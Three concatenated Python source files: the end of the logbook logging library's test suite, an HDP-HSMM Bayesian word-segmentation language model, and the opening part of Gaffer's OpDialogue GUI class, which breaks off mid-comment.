'\x1b[31;01mAn error',
'\x1b[39;49;00m\x1b[33;01mA warning',
'\x1b[39;49;00m\x1b[37mA debug message',
'\x1b[39;49;00m'
])
def test_tagged(self):
from logbook.more import TaggingLogger, TaggingHandler
stream = StringIO()
second_handler = logbook.StreamHandler(stream)
logger = TaggingLogger('name', ['cmd'])
handler = TaggingHandler(dict(
info=logbook.default_handler,
cmd=second_handler,
both=[logbook.default_handler, second_handler],
))
handler.bubble = False
with handler:
with capturing_stderr_context() as captured:
logger.log('info', 'info message')
logger.log('both', 'all message')
logger.cmd('cmd message')
stderr = captured.getvalue()
self.assertIn('info message', stderr)
self.assertIn('all message', stderr)
self.assertNotIn('cmd message', stderr)
stringio = stream.getvalue()
self.assertNotIn('info message', stringio)
self.assertIn('all message', stringio)
self.assertIn('cmd message', stringio)
def test_external_application_handler(self):
from logbook.more import ExternalApplicationHandler as Handler
with self._get_temporary_file_context() as fn:
handler = Handler([sys.executable, '-c', r'''if 1:
f = open(%(tempfile)s, 'w')
try:
f.write('{record.message}\n')
finally:
f.close()
''' % {'tempfile': repr(fn)}])
with handler:
self.log.error('this is a really bad idea')
with open(fn, 'r') as rf:
contents = rf.read().strip()
self.assertEqual(contents, 'this is a really bad idea')
def test_external_application_handler_stdin(self):
from logbook.more import ExternalApplicationHandler as Handler
with self._get_temporary_file_context() as fn:
handler = Handler([sys.executable, '-c', r'''if 1:
import sys
f = open(%(tempfile)s, 'w')
try:
f.write(sys.stdin.read())
finally:
f.close()
''' % {'tempfile': repr(fn)}], '{record.message}\n')
with handler:
self.log.error('this is a really bad idea')
with open(fn, 'r') as rf:
contents = rf.read().strip()
self.assertEqual(contents, 'this is a really bad idea')
def test_exception_handler(self):
from logbook.more import ExceptionHandler
with ExceptionHandler(ValueError) as exception_handler:
with self.assertRaises(ValueError) as caught:
self.log.info('here i am')
self.assertIn('INFO: testlogger: here i am', caught.exception.args[0])
def test_exception_handler_specific_level(self):
from logbook.more import ExceptionHandler
with logbook.TestHandler() as test_handler:
with self.assertRaises(ValueError) as caught:
with ExceptionHandler(ValueError, level='WARNING') as exception_handler:
self.log.info('this is irrelevant')
self.log.warn('here i am')
self.assertIn('WARNING: testlogger: here i am', caught.exception.args[0])
self.assertIn('this is irrelevant', test_handler.records[0].message)
def test_dedup_handler(self):
from logbook.more import DedupHandler
with logbook.TestHandler() as test_handler:
with DedupHandler():
self.log.info('foo')
self.log.info('bar')
self.log.info('foo')
self.assertEqual(2, len(test_handler.records))
self.assertIn('message repeated 2 times: foo', test_handler.records[0].message)
self.assertIn('message repeated 1 times: bar', test_handler.records[1].message)
class QueuesTestCase(LogbookTestCase):
def _get_zeromq(self, multi=False):
from logbook.queues import ZeroMQHandler, ZeroMQSubscriber
# Get an unused port
tempsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tempsock.bind(('127.0.0.1', 0))
host, unused_port = tempsock.getsockname()
tempsock.close()
# Retrieve the ZeroMQ handler and subscriber
uri = 'tcp://%s:%d' % (host, unused_port)
if multi:
handler = [ZeroMQHandler(uri, multi=True) for _ in range(3)]
else:
handler = ZeroMQHandler(uri)
subscriber = ZeroMQSubscriber(uri, multi=multi)
# Enough time to start
time.sleep(0.1)
return handler, subscriber
@require_module('zmq')
def test_zeromq_handler(self):
tests = [
u('Logging something'),
u('Something with umlauts äöü'),
u('Something else for good measure'),
]
handler, subscriber = self._get_zeromq()
for test in tests:
with handler:
self.log.warn(test)
record = subscriber.recv()
self.assertEqual(record.message, test)
self.assertEqual(record.channel, self.log.name)
@require_module('zmq')
def test_multi_zeromq_handler(self):
tests = [
u('Logging something'),
u('Something with umlauts äöü'),
u('Something else for good measure'),
]
handlers, subscriber = self._get_zeromq(multi=True)
for handler in handlers:
for test in tests:
with handler:
self.log.warn(test)
record = subscriber.recv()
self.assertEqual(record.message, test)
self.assertEqual(record.channel, self.log.name)
@require_module('zmq')
def test_zeromq_background_thread(self):
handler, subscriber = self._get_zeromq()
test_handler = logbook.TestHandler()
controller = subscriber.dispatch_in_background(test_handler)
with handler:
self.log.warn('This is a warning')
self.log.error('This is an error')
# stop the controller. This will also stop the loop and join the
# background process. Before that we give it a fraction of a second
# to get all results
time.sleep(0.2)
controller.stop()
self.assertTrue(test_handler.has_warning('This is a warning'))
self.assertTrue(test_handler.has_error('This is an error'))
@missing('zmq')
def test_missing_zeromq(self):
from logbook.queues import ZeroMQHandler, ZeroMQSubscriber
with self.assertRaises(RuntimeError):
ZeroMQHandler('tcp://127.0.0.1:42000')
with self.assertRaises(RuntimeError):
ZeroMQSubscriber('tcp://127.0.0.1:42000')
@require_module('multiprocessing')
def test_multi_processing_handler(self):
from multiprocessing import Process, Queue
from logbook.queues import MultiProcessingHandler, \
MultiProcessingSubscriber
queue = Queue(-1)
test_handler = logbook.TestHandler()
subscriber = MultiProcessingSubscriber(queue)
def send_back():
handler = MultiProcessingHandler(queue)
handler.push_thread()
try:
logbook.warn('Hello World')
finally:
handler.pop_thread()
p = Process(target=send_back)
p.start()
p.join()
with test_handler:
subscriber.dispatch_once()
self.assert_(test_handler.has_warning('Hello World'))
def test_threaded_wrapper_handler(self):
from logbook.queues import ThreadedWrapperHandler
test_handler = logbook.TestHandler()
with ThreadedWrapperHandler(test_handler) as handler:
self.log.warn('Just testing')
self.log.error('More testing')
# give it some time to sync up
handler.close()
self.assertTrue(not handler.controller.running)
self.assertTrue(test_handler.has_warning('Just testing'))
self.assertTrue(test_handler.has_error('More testing'))
@require_module('execnet')
def test_execnet_handler(self):
def run_on_remote(channel):
import logbook
from logbook.queues import ExecnetChannelHandler
handler = ExecnetChannelHandler(channel)
log = logbook.Logger("Execnet")
handler.push_application()
log.info('Execnet works')
import execnet
gw = execnet.makegateway()
channel = gw.remote_exec(run_on_remote)
from logbook.queues import ExecnetChannelSubscriber
subscriber = ExecnetChannelSubscriber(channel)
record = subscriber.recv()
self.assertEqual(record.msg, 'Execnet works')
gw.exit()
@require_module('multiprocessing')
def test_subscriber_group(self):
from multiprocessing import Process, Queue
from logbook.queues import MultiProcessingHandler, \
MultiProcessingSubscriber, SubscriberGroup
a_queue = Queue(-1)
b_queue = Queue(-1)
test_handler = logbook.TestHandler()
subscriber = SubscriberGroup([
MultiProcessingSubscriber(a_queue),
MultiProcessingSubscriber(b_queue)
])
def make_send_back(message, queue):
def send_back():
with MultiProcessingHandler(queue):
logbook.warn(message)
return send_back
for _ in range(10):
p1 = Process(target=make_send_back('foo', a_queue))
p2 = Process(target=make_send_back('bar', b_queue))
p1.start()
p2.start()
p1.join()
p2.join()
messages = [subscriber.recv().message for i in (1, 2)]
self.assertEqual(sorted(messages), ['bar', 'foo'])
@require_module('redis')
def test_redis_handler(self):
import redis
from logbook.queues import RedisHandler
KEY = 'redis'
FIELDS = ['message', 'host']
r = redis.Redis(decode_responses=True)
redis_handler = RedisHandler(level=logbook.INFO, bubble=True)
# We don't want output for the tests, so we can wrap everything in a NullHandler
null_handler = logbook.NullHandler()
# Check default values
with null_handler.applicationbound():
with redis_handler:
logbook.info(LETTERS)
key, message = r.blpop(KEY)
# Are all the fields in the record?
[self.assertIn(field, message) for field in FIELDS]
self.assertEqual(key, KEY)
self.assertIn(LETTERS, message)
# Change the key of the handler and check it on redis
KEY = 'test_another_key'
redis_handler.key = KEY
with null_handler.applicationbound():
with redis_handler:
logbook.info(LETTERS)
key, message = r.blpop(KEY)
self.assertEqual(key, KEY)
# Check that extra fields are added if specified when creating the handler
FIELDS.append('type')
extra_fields = {'type': 'test'}
del(redis_handler)
redis_handler = RedisHandler(key=KEY, level=logbook.INFO,
extra_fields=extra_fields, bubble=True)
with null_handler.applicationbound():
with redis_handler:
logbook.info(LETTERS)
key, message = r.blpop(KEY)
[self.assertIn(field, message) for field in FIELDS]
self.assertIn('test', message)
# And finally, check that fields are correctly added if appended to the
# log message
FIELDS.append('more_info')
with null_handler.applicationbound():
with redis_handler:
logbook.info(LETTERS, more_info='This works')
key, message = r.blpop(KEY)
[self.assertIn(field, message) for field in FIELDS]
self.assertIn('This works', message)
class TicketingTestCase(LogbookTestCase):
@require_module('sqlalchemy')
def test_basic_ticketing(self):
from logbook.ticketing import TicketingHandler
with TicketingHandler('sqlite:///') as handler:
for x in xrange(5):
self.log.warn('A warning')
self.log.info('An error')
if x < 2:
try:
1 / 0
except Exception:
self.log.exception()
self.assertEqual(handler.db.count_tickets(), 3)
tickets = handler.db.get_tickets()
self.assertEqual(len(tickets), 3)
self.assertEqual(tickets[0].level, logbook.INFO)
self.assertEqual(tickets[1].level, logbook.WARNING)
self.assertEqual(tickets[2].level, logbook.ERROR)
self.assertEqual(tickets[0].occurrence_count, 5)
self.assertEqual(tickets[1].occurrence_count, 5)
self.assertEqual(tickets[2].occurrence_count, 2)
self.assertEqual(tickets[0].last_occurrence.level, logbook.INFO)
tickets[0].solve()
self.assert_(tickets[0].solved)
tickets[0].delete()
ticket = handler.db.get_ticket(tickets[1].ticket_id)
self.assertEqual(ticket, tickets[1])
occurrences = handler.db.get_occurrences(tickets[2].ticket_id,
order_by='time')
self.assertEqual(len(occurrences), 2)
record = occurrences[0]
self.assertIn(__file_without_pyc__, record.filename)
# avoid 2to3 destroying our assertion
self.assertEqual(getattr(record, 'func_name'), 'test_basic_ticketing')
self.assertEqual(record.level, logbook.ERROR)
self.assertEqual(record.thread, get_ident())
self.assertEqual(record.process, os.getpid())
self.assertEqual(record.channel, 'testlogger')
self.assertIn('1 / 0', record.formatted_exception)
class HelperTestCase(LogbookTestCase):
def test_jsonhelper(self):
from logbook.helpers import to_safe_json
class Bogus(object):
def __str__(self):
return 'bogus'
rv = to_safe_json([
None,
'foo',
u('jäger'),
1,
datetime(2000, 1, 1),
{'jäger1': 1, u('jäger2'): 2, Bogus(): 3, 'invalid': object()},
object() # invalid
])
self.assertEqual(
rv, [None, u('foo'), u('jäger'), 1, '2000-01-01T00:00:00Z',
{u('jäger1'): 1, u('jäger2'): 2, u('bogus'): 3,
u('invalid'): None}, None])
def test_datehelpers(self):
from logbook.helpers import format_iso8601, parse_iso8601
now = datetime.now()
rv = format_iso8601()
self.assertEqual(rv[:4], str(now.year))
self.assertRaises(ValueError, parse_iso8601, 'foo')
v = parse_iso8601('2000-01-01T00:00:00.12Z')
self.assertEqual(v.microsecond, 120000)
v = parse_iso8601('2000-01-01T12:00:00+01:00')
self.assertEqual(v.hour, 11)
v = parse_iso8601('2000-01-01T12:00:00-01:00')
self.assertEqual(v.hour, 13)
class UnicodeTestCase(LogbookTestCase):
# in Py3 we can just assume a more uniform unicode environment
@require_py3
def test_default_format_unicode(self):
with capturing_stderr_context() as stream:
self.log.warn('\u2603')
self.assertIn('WARNING: testlogger: \u2603', stream.getvalue())
@require_py3
def test_default_format_encoded(self):
with capturing_stderr_context() as stream:
# it's a string but it's in the right encoding so don't barf
self.log.warn('\u2603')
self.assertIn('WARNING: testlogger: \u2603', stream.getvalue())
@require_py3
def test_default_format_bad_encoding(self):
with capturing_stderr_context() as stream:
# it's a byte string in the wrong encoding, but just dump it into the
# logger, don't try to decode/encode it
self.log.warn('Русский'.encode('koi8-r'))
self.assertIn("WARNING: testlogger: b'\\xf2\\xd5\\xd3\\xd3\\xcb\\xc9\\xca'", stream.getvalue())
@require_py3
def test_custom_unicode_format_unicode(self):
format_string = ('[{record.level_name}] '
'{record.channel}: {record.message}')
with capturing_stderr_context() as stream:
with logbook.StderrHandler(format_string=format_string):
self.log.warn("\u2603")
self.assertIn('[WARNING] testlogger: \u2603', stream.getvalue())
@require_py3
def test_custom_string_format_unicode(self):
format_string = ('[{record.level_name}] '
'{record.channel}: {record.message}')
with capturing_stderr_context() as stream:
with logbook.StderrHandler(format_string=format_string):
self.log.warn('\u2603')
self.assertIn('[WARNING] testlogger: \u2603', stream.getvalue())
@require_py3
def test_unicode_message_encoded_params(self):
with capturing_stderr_context() as stream:
self.log.warn("\u2603 {0}", "\u2603".encode('utf8'))
self.assertIn("WARNING: testlogger: \u2603 b'\\xe2\\x98\\x83'", stream.getvalue())
@require_py3
def test_encoded_message_unicode_params(self):
with capturing_stderr_context() as stream:
self.log.warn('\u2603 {0}'.encode('utf8'), '\u2603')
self.assertIn('WARNING: testlogger: \u2603 \u2603', stream.getvalue())
@require_module('gevent')
def test_gevent_spawn(self):
from gevent import spawn, sleep
def func(handler):
with handler.threadbound():
self.log.warn("hi")
sleep(0.1)
self.log.warn("bye")
with capturing_stderr_context() as stream:
stderr_handler = logbook.StderrHandler(format_string="foo")
null_handler = logbook.NullHandler()
f1 = spawn(func, stderr_handler)
f2 = spawn(func, null_handler)
f1.join()
f2.join()
captured = stream.getvalue()
self.assertEquals("foo\nfoo\n", captured)
def suite():
loader = unittest.TestLoader()
suite = LogbookTestSuite()
suite.addTests(loader.loadTestsFromName(__name__))
try:
suite.addTests(loader.loadTestsFromName
('logbook.testsuite.test_contextmanager'))
except SyntaxError:
# Python 2.4 does not support the 'with' statement
pass
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
language.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
from multiprocessing import Process, Queue
from HDP_HSMM.basic.distributions import PoissonDuration
from HDP_HSMM.internals.transitions import HDPHMMTransitions
from HDP_HSMM.internals.states import InitialState
from HDP_HSMM.basic.util import sample_discrete, rle, engine_global_namespace
#########################################################
# Word states class #
#########################################################
class WordStates:
def __init__(self, data, model):
self.data = np.asarray(data)
self.model = model
self.T = len(data)
self.stateseq = []
self.letters = []
self.clear_caches()
self.resample()
self.betal
def clear_caches(self):
self._Al = None
self._aDl = None
self._aBl = None
self._dl = None
self._cache_alphal = None
self._durations = None
self._stateseq_norep = None
self.state_ranges = None
@property
def stateseq_norep(self):
if self._stateseq_norep is None:
self._stateseq_norep, dur = rle(self.stateseq)
return self._stateseq_norep
@property
def durations(self):
if self._durations is None:
self._letterseq_norep, self._durations = rle(self.letterseq)
return self._durations
@property
def aDl(self):
if self._aDl is None:
aDl = self._aDl = np.empty((self.T, self.model.state_dim))
possible_durations = np.arange(1, self.T + 1, dtype = np.float64)
for idx, dist in enumerate(self.model.word_dur_dists):
aDl[:, idx] = dist.log_likelihood(possible_durations)
return self._aDl
@property
def aD(self):
return np.exp(self.aDl)
@property
def A(self):
return self.model.trans_dists.A
@property
def Al(self):
if self._Al is None:
self._Al = np.log(self.model.trans_dists.A)
return self._Al
@property
def aBl(self):
if self._aBl is None:
self._aBl = aBl = np.empty((self.T, self.model.letter_dim))
for idx, dist in enumerate(self.model.obs_distns):
aBl[:, idx] = np.nan_to_num(dist.log_likelihood(self.data))
return self._aBl
@property
def dl(self):
if self._dl is None:
self._dl = dl = np.empty((self.T, self.model.letter_dim))
possible_durations = np.arange(1, self.T + 1, dtype = np.float64)
for idx, dist in enumerate(self.model.dur_distns):
dl[:, idx] = dist.log_likelihood(possible_durations)
return self._dl
def resample(self):
self.clear_caches()
betal, betastarl = self.messages_backwards()
self.sample_forwards(betal, betastarl)
def messages_backwards(self, trunc = 60):
Al = self.Al
aDl = self.aDl
state_dim = self.model.state_dim
self.betal = betal = np.zeros((self.T, state_dim), dtype = np.float64)
self.betastarl = betastarl = np.zeros((self.T, state_dim), dtype = np.float64)
T = self.T
for t in range(T - 1, -1, -1):
betastarl[t] = np.logaddexp.reduce(
betal[t:t+trunc] + self.cumulative_likelihoods(t, t + trunc) + aDl[:min(trunc, T-t)],
axis = 0
)
betal[t-1] = np.logaddexp.reduce(betastarl[t] + Al, axis = 1)
betal[-1] = 0.0
return betal, betastarl
def sample_forwards(self, betal, betastarl):
T = self.T
A = self.A
aD = self.aD
stateseq = self.stateseq = np.zeros(T, dtype = np.int32)
state_ranges = self.state_ranges = []
idx = 0
nextstate_unsmoothed = self.model.init_dist.pi_0
while idx < T:
logdomain = betastarl[idx] - np.amax(betastarl[idx])
nextstate_dist = np.exp(logdomain) * nextstate_unsmoothed
if (nextstate_dist == 0.).all():
nextstate_dist = np.exp(logdomain)
state = sample_discrete(nextstate_dist)
durprob = np.random.random()
word = self.model.word_list[state]
dur = len(word) - 1
while durprob > 0:
p_d_prior = aD[dur, state] if dur < T else 1.
assert not np.isnan(p_d_prior)
assert p_d_prior >= 0
if p_d_prior == 0:
dur += 1
continue
if idx + dur < T:
loglikelihood = self.likelihood_block_word(idx, idx+dur+1, word)
mess_term = np.exp(loglikelihood + betal[idx+dur, state] - betastarl[idx, state])
p_d = mess_term * p_d_prior
assert not np.isnan(p_d)
durprob -= p_d
dur += 1
else:
dur += 1
break
assert dur > 0
assert dur >= len(word)
stateseq[idx:idx+dur] = state
state_ranges.append((state, (idx, idx + dur)))
nextstate_unsmoothed = A[state]
idx += dur
def cumulative_likelihoods(self, start, stop):
T = min(self.T, stop)
tsize = T - start
ret = np.zeros((tsize, self.model.state_dim))
for state, word in enumerate(self.model.word_list):
self.likelihood_block_word(start, stop, word)
alphal = self._cache_alphal
ret[:, state] = alphal[:, -1]
return ret
def likelihood_block_word(self, start, stop, word):
T = min(self.T, stop)
tsize = T - start
aBl = self.aBl
len_word = len(word)
self._cache_alphal = alphal = np.ones((tsize, len_word)) * -np.inf
for j, l in enumerate(word):
for t in range(j, tsize - len_word + j + 1):
if j == 0:
alphal[t, j] = np.sum(aBl[start:start+t+1, l]) + self.dl[t, l]
else:
alphal[t, j] = np.logaddexp.reduce([
np.sum(aBl[start+t-d:start+t+1, l]) + \
self.dl[d, l] + \
alphal[t - d - 1, j - 1]
for d in range(t + 1)
])
return alphal[-1, -1]
#########################################################
# Language model class #
#########################################################
class LanguageHSMMModel(object):
def __init__(self, hypparams, letter_hsmm, length_dist, obs_dists, dur_dists, parallel = True):
self.trans_dists = HDPHMMTransitions(**hypparams)
self.letter_hsmm = letter_hsmm
self.length_dist = length_dist
self.state_dim = hypparams['state_dim']
self.letter_dim = len(obs_dists)
self.init_dist = InitialState(state_dim = self.state_dim, rho = 1.0)
self.states_list = []
self.parallel = parallel
word_set = set()
while len(word_set) < self.state_dim:
word = self.generate_word()
word_set.add(word)
self.word_list = list(word_set)
self.resample_dur_dists()
@property
def obs_distns(self):
return self.letter_hsmm.obs_distns
@property
def dur_distns(self):
return self.letter_hsmm.dur_distns
def generate_word(self):
size = self.length_dist.rvs() or 1
return self.letter_hsmm.generate_word(size)
def generate(self, limit_len = 3):
nextstate_dist = self.init_dist.pi_0
A = self.trans_dists.A
state_list = []
for _ in range(limit_len):
state = sample_discrete(nextstate_dist)
state_list.append(state)
nextstate_dist = A[state]
stateseq = []
letseq = []
obsseq = []
for s in state_list:
for l in self.word_list[s]:
d = self.dur_distns[l].rvs() or 1
o = self.obs_distns[l].rvs(size = d)
obsseq.append(o)
letseq.append([l] * d)
stateseq.append([s] * d)
return map(np.concatenate, (stateseq, letseq, obsseq))
def add_data(self, data):
from HDP_HSMM import parallel
self.states_list.append(WordStates(data, self))
# when parallel == True, the call below is required, otherwise an error occurs
if self.parallel:
parallel.add_data(self.states_list[-1].data)
def resample_model(self):
if self.parallel:
self.resample_states_parallel()
else:
self.resample_states()
self.resample_letter_params()
self.resample_dur_dists()
self.resample_trans_dist()
self.resample_init_dist()
def resample_trans_dist(self):
self.trans_dists.resample(np.array([[state for (state, _) in s.state_ranges] for s in self.states_list]))
def resample_init_dist(self):
self.init_dist.resample([s.stateseq[:1] for s in self.states_list])
def resample_states(self):
[s.resample() for s in self.states_list]
def resample_states_parallel(self):
from HDP_HSMM import parallel
states = self.states_list
self.states_list = []
raw = parallel.map_on_each(
self._states_sampler,
[s.data for s in states],
kwargss = self._get_parallel_kwargss(states),
engine_globals = dict(global_model = self)
)
self.states_list = states
# in the example below, only the state labels and state duration ranges are received as the result
"""
for s1, ret in zip(self.states_list, raw):
s1.stateseq, s1.state_ranges = ret
"""
for s1, ret in zip(self.states_list, raw):
s1.stateseq = ret.stateseq
s1.state_ranges = ret.state_ranges
s1.betal = ret.betal
@staticmethod
@engine_global_namespace
def _states_sampler(data):
global_model.add_data(data = data)
model = global_model.states_list.pop()
# in the example below, the state labels and state duration ranges are retrieved from the computed model
"""
return model.stateseq, model.state_ranges
"""
return model
def resample_letter_params(self):
states_index = [0]
hsmm = self.letter_hsmm
hsmm.states_list = []
for s in self.states_list:
s.letterseq = np.ones(len(s.data), dtype = np.int64) * -1
for state in range(self.state_dim):
for s in self.states_list:
for state2, (start, stop) in s.state_ranges:
if state == state2:
hsmm.add_data_parallel(s.data[start:stop])
hsmm.states_list[-1].letterseq = s.letterseq[start:stop]
states_index.append(len(hsmm.states_list))
hsmm.resample_states_parallel()
likelihoods = hsmm.likelihoods()
state_count = {}
for state, bound in enumerate(zip(states_index[:-1], states_index[1:])):
staff = range(*bound)
if len(staff) == 0:
self.word_list[state] = self.generate_word()
continue
candidates = []
scores = []
for idx in staff:
rest = set(staff) - set([idx])
word = hsmm.states_list[idx].stateseq_norep
## parallelize: nakashima edit
def multi_bw(hsmm, word, s, q):
q.put(hsmm.states_list[s].likelihood_block_word(0, len(hsmm.states_list[s].data), word))
q = Queue()
pr_l = []
for s in rest:
pr = Process(target=multi_bw, args=(hsmm, word, s, q))
pr_l.append(pr)
pr.start()
for p in pr_l:
p.join()
q_l = [q.get() for i in range(len(pr_l))]
score = np.sum(q_l) + likelihoods[idx]
## -------------------------------------
"""
score = np.sum([hsmm.states_list[s].likelihood_block_word(0, len(hsmm.states_list[s].data), word) for s in rest]) + likelihoods[idx]
"""
scores.append(score)
candidates.append(tuple(word))
resample_state_flag = len(set(candidates)) > 1
if resample_state_flag:
word_idx = sample_discrete(np.exp(scores))
sampleseq = candidates[word_idx]
else:
sampleseq = candidates[0]
self.word_list[state] = tuple(sampleseq)
for idx in staff:
s = hsmm.states_list[idx]
s.letterseq[:] = s.stateseq
word = tuple(s.stateseq_norep)
hsmm.resample_trans_distn()
hsmm.resample_init_state_distn()
hsmm.resample_dur_distns()
hsmm.resample_obs_distns()
self.resample_length_dist()
def resample_length_dist(self):
self.length_dist.resample(np.array(map(len, self.word_list)))
def resample_dur_dists(self):
self.word_dur_dists = [
PoissonDuration(lmbda = np.sum([self.dur_distns[c].lmbda for c in w]))
for w in self.word_list
]
def _get_parallel_kwargss(self,states_objs):
# this method is broken out so that it can be overridden
return [{}]*len(states_objs)
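# A hedged driver sketch (not part of the original file): the constructor
# arguments (hypparams, letter_hsmm, length_dist, obs_dists, dur_dists) are
# assumed to come from the surrounding HDP_HSMM setup and are not defined here.
#
#   model = LanguageHSMMModel(hypparams, letter_hsmm, length_dist, obs_dists, dur_dists, parallel=False)
#   for data in observations:
#       model.add_data(data)
#   for itr in range(100):
#       model.resample_model()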
|
OpDialogue.py
|
##########################################################################
#
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import sys
import threading
import traceback
import IECore
import Gaffer
import GafferUI
## A dialogue which allows a user to edit the parameters of an
# IECore.Op instance and then execute it.
class OpDialogue( GafferUI.Dialogue ) :
## Defines what happens when the op has been successfully executed :
#
# FromUserData : Get behaviour from ["UI"]["postExecuteBehaviour"] userData, which should
# contain a string value specifying one of the other Enum values. If no userData is found,
# it defaults to DisplayResult.
#
# None : Do nothing. The dialogue returns to the parameter editing state.
#
# Close : The dialogue is closed immediately.
#
# DisplayResult : The result is displayed, with a button for returning to the parameter editing state.
#
# DisplayResultAndClose : The result is displayed, with a button for closing the dialogue.
#
# NoneByDefault : deprecated - the same as DisplayResult
# CloseByDefault : deprecated - the same as DisplayResult
PostExecuteBehaviour = IECore.Enum.create( "FromUserData", "None", "Close", "DisplayResult", "DisplayResultAndClose", "NoneByDefault", "CloseByDefault" )
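# A hedged usage sketch (not part of this file): an Op can request a specific
# post-execute behaviour through the ["UI"]["postExecuteBehaviour"] userData
# documented above. The Op subclass "MyOp" is an illustrative assumption :
#
#   op = MyOp()
#   op.userData()["UI"] = IECore.CompoundObject( {
#       "postExecuteBehaviour" : IECore.StringData( "close" ),
#   } )
#   dialogue = OpDialogue( op )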
## Defines which button has the focus when the op is displayed for editing.
#
# FromUserData : Gets the default button from ["UI"]["defaultButton"] userData, which
# should contain a string value specifying one of the other Enum values. If no userData is found,
# it defaults to OK.
#
# None : Neither button has the focus.
#
# OK : The OK button has the focus.
#
# Cancel : The cancel button has the focus.
DefaultButton = IECore.Enum.create( "FromUserData", "None", "OK", "Cancel" )
# If executeInBackground is True, then the Op will be executed on another
# thread, allowing the UI to remain responsive during execution. This is
# the preferred method of operation, but it is currently not the default
# in case certain clients are relying on running the Op on the main thread.
def __init__(
self,
opInstanceOrOpHolderInstance,
title=None,
sizeMode=GafferUI.Window.SizeMode.Manual,
postExecuteBehaviour = PostExecuteBehaviour.FromUserData,
executeInBackground = False,
defaultButton = DefaultButton.FromUserData,
executeImmediately = False,
**kw
) :
# sort out our op and op holder
if isinstance( opInstanceOrOpHolderInstance, IECore.Op ) :
opInstance = opInstanceOrOpHolderInstance
self.__node = Gaffer.ParameterisedHolderNode()
self.__node.setParameterised( opInstance )
# set the current plug values as userDefaults to provide
# a clean NodeUI based on the initial settings of the Op.
# we assume that if an OpHolder was passed directly then
# the metadata has already been setup as preferred.
self.__setUserDefaults( self.__node )
else :
self.__node = opInstanceOrOpHolderInstance
opInstance = self.__node.getParameterised()[0]
# initialise the dialogue
if title is None :
title = IECore.CamelCase.toSpaced( opInstance.typeName() )
GafferUI.Dialogue.__init__( self, title, sizeMode=sizeMode, **kw )
# decide what we'll do after execution.
if postExecuteBehaviour == self.PostExecuteBehaviour.FromUserData :
postExecuteBehaviour = self.PostExecuteBehaviour.DisplayResult
d = None
with IECore.IgnoredExceptions( KeyError ) :
d = opInstance.userData()["UI"]["postExecuteBehaviour"]
if d is not None :
for v in self.PostExecuteBehaviour.values() :
if str( v ).lower() == d.value.lower() :
postExecuteBehaviour = v
break
else :
# backwards compatibility with batata
with IECore.IgnoredExceptions( KeyError ) :
d = opInstance.userData()["UI"]["closeAfterExecution"]
if d is not None :
postExecuteBehaviour = self.PostExecuteBehaviour.Close if d.value else self.PostExecuteBehaviour.DisplayResult
self.__postExecuteBehaviour = postExecuteBehaviour
self.__executeInBackground = executeInBackground
self.__defaultButton = defaultButton
# make a frame to contain our main ui element. this will
# contain different elements depending on our state.
self.__frame = GafferUI.Frame()
self._setWidget( self.__frame )
# get the ui for the op - we'll use this when we want
# the user to edit parameters.
self.__parameterEditingUI = GafferUI.NodeUI.create( self.__node )
# build a ui element for progress feedback and suchlike.
# we'll use this when executing and displaying the result.
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Vertical, spacing = 4 ) as self.__progressUI :
GafferUI.Spacer( IECore.V2i( 1 ), parenting = { "expand" : True } )
self.__progressIconFrame = GafferUI.Frame(
borderStyle = GafferUI.Frame.BorderStyle.None,
parenting = {
"horizontalAlignment" : GafferUI.HorizontalAlignment.Center
}
)
self.__progressLabel = GafferUI.Label(
parenting = {
"expand" : True,
"horizontalAlignment" : GafferUI.HorizontalAlignment.Center,
}
)
GafferUI.Spacer( IECore.V2i( 250, 1 ), parenting = { "expand" : True } )
with GafferUI.Collapsible( "Details", collapsed = True ) as self.__messageCollapsible :
self.__messageWidget = GafferUI.MessageWidget()
# connect to the collapsible state change so we can increase the window
# size when the details pane is first shown.
self.__messageCollapsibleStateChangedConnection = self.__messageCollapsible.stateChangedSignal().connect(
Gaffer.WeakMethod( self.__messageCollapsibleStateChanged )
)
# add buttons. our buttons mean different things depending on our current state,
# but they equate roughly to going forwards or going backwards.
self.__backButton = self._addButton( "Back" )
self.__forwardButton = self._addButton( "Forward" )
self.__preExecuteSignal = GafferUI.WidgetSignal()
self.__postExecuteSignal = Gaffer.Signal2()
self.__opExecutedSignal = Gaffer.Signal1()
self.__haveResizedToFitParameters = False
if executeImmediately :
self.__initiateExecution()
else :
self.__initiateParameterEditing()
## Returns the ParameterisedHolder used to store the Op.
# This may be used to edit parameter values.
def parameterisedHolder( self ) :
return self.__node
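# For example (a sketch; the parameter name "fileName" is hypothetical), a host
# application could preset a value before showing the dialogue :
#
#   dialogue.parameterisedHolder()["parameters"]["fileName"].setValue( "/tmp/result.cob" )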
## Signal emitted before executing the Op.
# Slots should have the signature `bool slot( opDialogue )`,
